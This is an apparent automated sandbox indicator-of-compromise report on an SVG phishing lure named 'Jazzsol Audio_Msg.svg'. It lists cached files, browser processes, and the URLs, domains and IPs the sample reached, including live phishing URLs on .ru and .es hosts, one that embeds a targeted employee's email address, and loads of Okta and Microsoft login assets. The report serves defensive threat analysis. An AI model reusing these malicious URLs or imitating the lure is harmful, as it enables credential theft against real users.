IOC Report
Jazzsol Audio_Msg.svg

loading gifFilesProcessesURLsDomainsIPsDOM642020102Label

Files

File Path
Type
Category
Malicious
Download
Jazzsol Audio_Msg.svg
SVG Scalable Vector Graphics image
initial sample
 malicious
Chrome Cache Entry: 100
HTML document, ASCII text, with very long lines (52013), with CRLF line terminators
downloaded
Chrome Cache Entry: 101
SVG Scalable Vector Graphics image
dropped
Chrome Cache Entry: 102
RIFF (little-endian) data, Web/P image
dropped
Chrome Cache Entry: 103
SVG Scalable Vector Graphics image
dropped
Chrome Cache Entry: 104
HTML document, ASCII text, with very long lines (17089), with CRLF line terminators
downloaded
Chrome Cache Entry: 105
RIFF (little-endian) data, Web/P image
downloaded
Chrome Cache Entry: 106
ASCII text, with very long lines (48316), with no line terminators
downloaded
Chrome Cache Entry: 107
PNG image data, 148 x 85, 8-bit colormap, non-interlaced
downloaded
Chrome Cache Entry: 108
SVG Scalable Vector Graphics image
dropped
Chrome Cache Entry: 109
RIFF (little-endian) data, Web/P image
downloaded
Chrome Cache Entry: 110
SVG Scalable Vector Graphics image
dropped
Chrome Cache Entry: 111
PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
dropped
Chrome Cache Entry: 112
Unicode text, UTF-8 text, with very long lines (21720), with CRLF line terminators
downloaded
Chrome Cache Entry: 113
RIFF (little-endian) data, Web/P image
downloaded
Chrome Cache Entry: 114
ASCII text, with very long lines (26765), with no line terminators
downloaded
Chrome Cache Entry: 115
Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
downloaded
Chrome Cache Entry: 116
RIFF (little-endian) data, Web/P image
dropped
Chrome Cache Entry: 117
Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
downloaded
Chrome Cache Entry: 118
Web Open Font Format, TrueType, length 35970, version 1.0
downloaded
Chrome Cache Entry: 119
RIFF (little-endian) data, Web/P image
dropped
Chrome Cache Entry: 120
PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
downloaded
Chrome Cache Entry: 121
PNG image data, 148 x 85, 8-bit colormap, non-interlaced
dropped
Chrome Cache Entry: 122
RIFF (little-endian) data, Web/P image
downloaded
Chrome Cache Entry: 123
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 124
very short file (no magic)
dropped
Chrome Cache Entry: 125
ASCII text, with no line terminators
downloaded
Chrome Cache Entry: 80
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 81
ASCII text, with CRLF line terminators
downloaded
Chrome Cache Entry: 82
Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
downloaded
Chrome Cache Entry: 83
RIFF (little-endian) data, Web/P image
dropped
Chrome Cache Entry: 84
RIFF (little-endian) data, Web/P image
downloaded
Chrome Cache Entry: 85
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 86
SVG Scalable Vector Graphics image
dropped
Chrome Cache Entry: 87
ASCII text, with very long lines (65447)
downloaded
Chrome Cache Entry: 88
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 89
ASCII text, with very long lines (10450)
downloaded
Chrome Cache Entry: 90
very short file (no magic)
downloaded
Chrome Cache Entry: 91
ASCII text, with no line terminators
downloaded
Chrome Cache Entry: 92
ASCII text, with very long lines (51734)
downloaded
Chrome Cache Entry: 93
RIFF (little-endian) data, Web/P image
downloaded
Chrome Cache Entry: 94
RIFF (little-endian) data, Web/P image
dropped
Chrome Cache Entry: 95
Web Open Font Format, TrueType, length 36696, version 1.0
downloaded
Chrome Cache Entry: 96
ASCII text, with very long lines (10017)
downloaded
Chrome Cache Entry: 97
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 98
Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
downloaded
Chrome Cache Entry: 99
RIFF (little-endian) data, Web/P image
dropped
There are 37 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2152,i,15750090068326536515,15019451711460223245,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2260 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Jazzsol Audio_Msg.svg"

URLs

Name
IP
Malicious
https://zsj.gamnfztl.ru/aT2Qm/
104.21.32.1
 malicious
https://zsj.gamnfztl.ru/lkyjwphwipbrshfwsqvnwklpolvctsaddgu2swnfw?WNKEBWEJFMOTKLFTWQS
malicious
https://zsj.gamnfztl.ru/abBd4coPek7Vrs6qpgh23
104.21.32.1
https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7
18.164.124.110
https://olr31hzyv8aluvblganmmiwdojbb4l3jikidtbavxfjfs5pmvcmcn.caspianxw.es/lncteuojmrodrytseemzgpuKDAIYCFPQXSZOAGPZNDEZBTOWRXZYPDVVZQHLBMpq7UZygw3g8GdeO34NYwx40
104.21.112.1
https://zsj.gamnfztl.ru/aT2Qm/#Mavery.moore@jazzsol.com
https://zsj.gamnfztl.ru/weYNKvdCVZyzSPWb49Sm7m
104.21.32.1
https://code.jquery.com/jquery-3.6.0.min.js
151.101.66.137
https://zsj.gamnfztl.ru/favicon.ico
104.21.32.1
https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
104.17.24.14
https://zsj.gamnfztl.ru/efQfEFbBsA1PWjqjC2AsB3Sf3dRFflrh48dPkl3viW8WDARjIzdLtY2l8Xc590150
104.21.32.1
https://olr31hzyv8aluvblganmmiwdojbb4l3jikidtbavxfjfs5pmvcmcn.caspianxw.es/lncteuojmrodrytseemzgpuKDAIYCFPQXSZOAGPZNDEZBTOWRXZYPDVVZQHLBM12jvBQfcXFekV78xC5op44
104.21.112.1
https://zsj.gamnfztl.ru/ijV2sMHmHlYU6sScs3cNcduHhH5jc9fLdixgY52he78162
104.21.32.1
https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css
18.164.124.110
https://zsj.gamnfztl.ru/sttp9YLQTb0kBgoRyDVkLkm41He23tAEUHREaBoUhPEYXGDCh4ftmnKFGSR5aRz37QbiBO3av59LmmaI08PGLQCtYbgh259
104.21.32.1
https://zsj.gamnfztl.ru/56iBh9wYpPv2hLE61mp9Ipgij7NZ7aJmNLtZJ89110
104.21.32.1
https://zsj.gamnfztl.ru/ghWnOkFleiFQVUIN2Rokx0mnV6jktMYiINcrOcdA5ygj12205
104.21.32.1
https://zsj.gamnfztl.ru/mnM6Ws9omfLxH5gBqh9docIE0yIP8Sho1qHJCINn6klPQrkstcz7hFCBoq7Kuv220
104.21.32.1
https://zsj.gamnfztl.ru/GDSherpa-regular.woff
104.21.32.1
https://zsj.gamnfztl.ru/GDSherpa-vf.woff2
104.21.32.1
https://olr31hzyv8aluvblganmmiwdojbb4l3jikidtbavxfjfs5pmvcmcn.caspianxw.es/lncteuojmrodrytseemzgpuKDAIYCFPQXSZOAGPZNDEZBTOWRXZYPDVVZQHLBMyzqrxCoLQ78wxIEmCqr42
104.21.112.1
https://zsj.gamnfztl.ru/GDSherpa-regular.woff2
104.21.32.1
https://olr31hzyv8aluvblganmmiwdojbb4l3jikidtbavxfjfs5pmvcmcn.caspianxw.es/lncteuojmrodrytseemzgpuKDAIYCFPQXSZOAGPZNDEZBTOWRXZYPDVVZQHLBMyzJOKqtI38q56usIzCZop50
104.21.112.1
https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css
18.164.124.110
https://a.nel.cloudflare.com/report/v4?s=KTpfwK24z8Pb1yyl8APrUZDrV%2BeJOYpy%2FIN6nGS91334RuP96y2Xfvp8gWB9E0T1HSfF6mSZLe95KdHfetYz1raG09C1FNnTceAbgt3gOUFeD0XfwAcc4qiQzbYYlVb%2BY%2FKv
35.190.80.1
https://zsj.gamnfztl.ru/yz3x3iFQeyzkifPtuQhN76NJOop7WHl7Lgij6SjopLj2ga90176
104.21.32.1
https://github.com/fent)
unknown
https://zsj.gamnfztl.ru/GDSherpa-vf2.woff2
104.21.32.1
https://zsj.gamnfztl.ru/12ZJFM0GxFX7pxyj5n8920
104.21.32.1
https://zsj.gamnfztl.ru/opsc3k2AIfcggTzvk8JgeYPFlmT012TADl8NCXkcgQtzdORQQIycd237
104.21.32.1
https://zsj.gamnfztl.ru/qrvzEvmaVkT9iUxv3Lmn3ghmNrwhtynu1KfZgx3Lf8Nz45138
104.21.32.1
https://zsj.gamnfztl.ru/gkRtSUXVo4GMwwPB2wbMA4no4fTwDUtBjLufxydv89EWijA5DsYsxHgnb
104.21.32.1
https://zsj.gamnfztl.ru/GDSherpa-bold.woff
104.21.32.1
https://k9ia.nmpjkg.ru/chai!yimom9g
104.21.64.1
https://zsj.gamnfztl.ru/kldBL4zcpsIGA3RQCE16rvuDk67NRU89NKlVQcuAKOHEZKqFVXUpKwzab225
104.21.32.1
https://www.etsy.com
unknown
https://get.geojs.io/v1/ip/geo.json
172.67.70.233
https://zsj.gamnfztl.ru/kfTYoY9zp6MlR0oOcv4avShQqN3UHLvwqI3DINlldnbOZsdfq
104.21.32.1
https://zsj.gamnfztl.ru/rshUXrcuwMcELYpsglH3R1srubjQneijev9aHyrn7AFS5ivHN3uKDYrmNcd198
104.21.32.1
https://aadcdn.msauthimages.net/dbd5a2dd-gn-5drtokny-zptvcmh7aynavltkuhd9z2gvx9val7y/logintenantbranding/0/bannerlogo?ts=637825606459016657
23.209.72.31
https://zsj.gamnfztl.ru/uvWvCCAu7xUYPr7WbScGqrUSw0brtaCJjM12127
104.21.32.1
https://zsj.gamnfztl.ru/GDSherpa-bold.woff2
104.21.32.1
There are 32 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
zsj.gamnfztl.ru
104.21.32.1
 malicious
a.nel.cloudflare.com
35.190.80.1
e329293.dscd.akamaiedge.net
23.209.72.31
code.jquery.com
151.101.66.137
cdnjs.cloudflare.com
104.17.24.14
github.com
140.82.112.3
olr31hzyv8aluvblganmmiwdojbb4l3jikidtbavxfjfs5pmvcmcn.caspianxw.es
104.21.112.1
get.geojs.io
172.67.70.233
www.google.com
142.250.81.228
k9ia.nmpjkg.ru
104.21.64.1
d19d360lklgih4.cloudfront.net
18.164.124.110
objects.githubusercontent.com
185.199.111.133
aadcdn.msauthimages.net
unknown
ok4static.oktacdn.com
unknown
There are 4 hidden domains, click here to show them.

IPs

IP
Domain
Country
Malicious
104.21.32.1
zsj.gamnfztl.ru
United States
malicious
104.17.24.14
cdnjs.cloudflare.com
United States
140.82.112.3
github.com
United States
104.21.64.1
k9ia.nmpjkg.ru
United States
192.168.2.6
unknown
unknown
142.250.81.228
www.google.com
United States
185.199.111.133
objects.githubusercontent.com
Netherlands
18.164.124.110
d19d360lklgih4.cloudfront.net
United States
104.21.112.1
olr31hzyv8aluvblganmmiwdojbb4l3jikidtbavxfjfs5pmvcmcn.caspianxw.es
United States
192.168.2.13
unknown
unknown
192.168.2.23
unknown
unknown
104.21.96.1
unknown
United States
172.67.70.233
get.geojs.io
United States
151.101.66.137
code.jquery.com
United States
18.164.124.11
unknown
United States
35.190.80.1
a.nel.cloudflare.com
United States
23.209.72.31
e329293.dscd.akamaiedge.net
United States
There are 7 hidden IPs, click here to show them.

DOM / HTML

URL
Malicious
https://zsj.gamnfztl.ru/aT2Qm/#Mavery.moore@jazzsol.com
 malicious
https://zsj.gamnfztl.ru/lkyjwphwipbrshfwsqvnwklpolvctsaddgu2swnfw?WNKEBWEJFMOTKLFTWQS
 malicious
https://zsj.gamnfztl.ru/lkyjwphwipbrshfwsqvnwklpolvctsaddgu2swnfw?WNKEBWEJFMOTKLFTWQS
 malicious
https://zsj.gamnfztl.ru/lkyjwphwipbrshfwsqvnwklpolvctsaddgu2swnfw?WNKEBWEJFMOTKLFTWQS
 malicious
https://zsj.gamnfztl.ru/lkyjwphwipbrshfwsqvnwklpolvctsaddgu2swnfw?WNKEBWEJFMOTKLFTWQS
 malicious
https://zsj.gamnfztl.ru/lkyjwphwipbrshfwsqvnwklpolvctsaddgu2swnfw?WNKEBWEJFMOTKLFTWQS
 malicious
https://zsj.gamnfztl.ru/aT2Qm/#Mavery.moore@jazzsol.com